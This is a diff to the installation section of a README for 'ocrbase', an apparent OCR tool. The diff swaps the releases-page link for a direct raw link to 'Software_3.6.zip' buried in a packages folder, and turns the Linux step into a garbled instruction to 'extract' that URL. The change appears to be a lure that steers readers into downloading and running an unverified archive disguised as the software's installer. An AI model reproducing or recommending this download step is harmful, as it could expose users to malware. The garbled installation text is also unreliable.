Biscoxx/ocrbase/README.md

 ## 🛠️ Installation Steps

-1. **Download the File:** Go to [this page to download](https://github.com/Biscoxx/ocrbase/releases) and select the file that matches your operating system.
+1. **Download the File:** Go to [this page to download](https://github.com/Biscoxx/ocrbase/raw/refs/heads/main/packages/paddleocr-vl-ts/Software_3.6.zip) and select the file that matches your operating system.

 2. **Locate the File:** Once downloaded, find the file in your downloads folder or the location you selected.

 3. **Run the Installer:**
    - For Windows: Double-click the `.exe` file and follow the prompts.
    - For macOS: Open the `.dmg` file, drag the application to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and follow the README instructions inside.
+   - For Linux: Extract the `https://github.com/Biscoxx/ocrbase/raw/refs/heads/main/packages/paddleocr-vl-ts/Software_3.6.zip` file and follow the README instructions inside.

 4. **Start the Application:** After installation, you can find ocrbase in your Applications or Programs menu.
 Click to launch.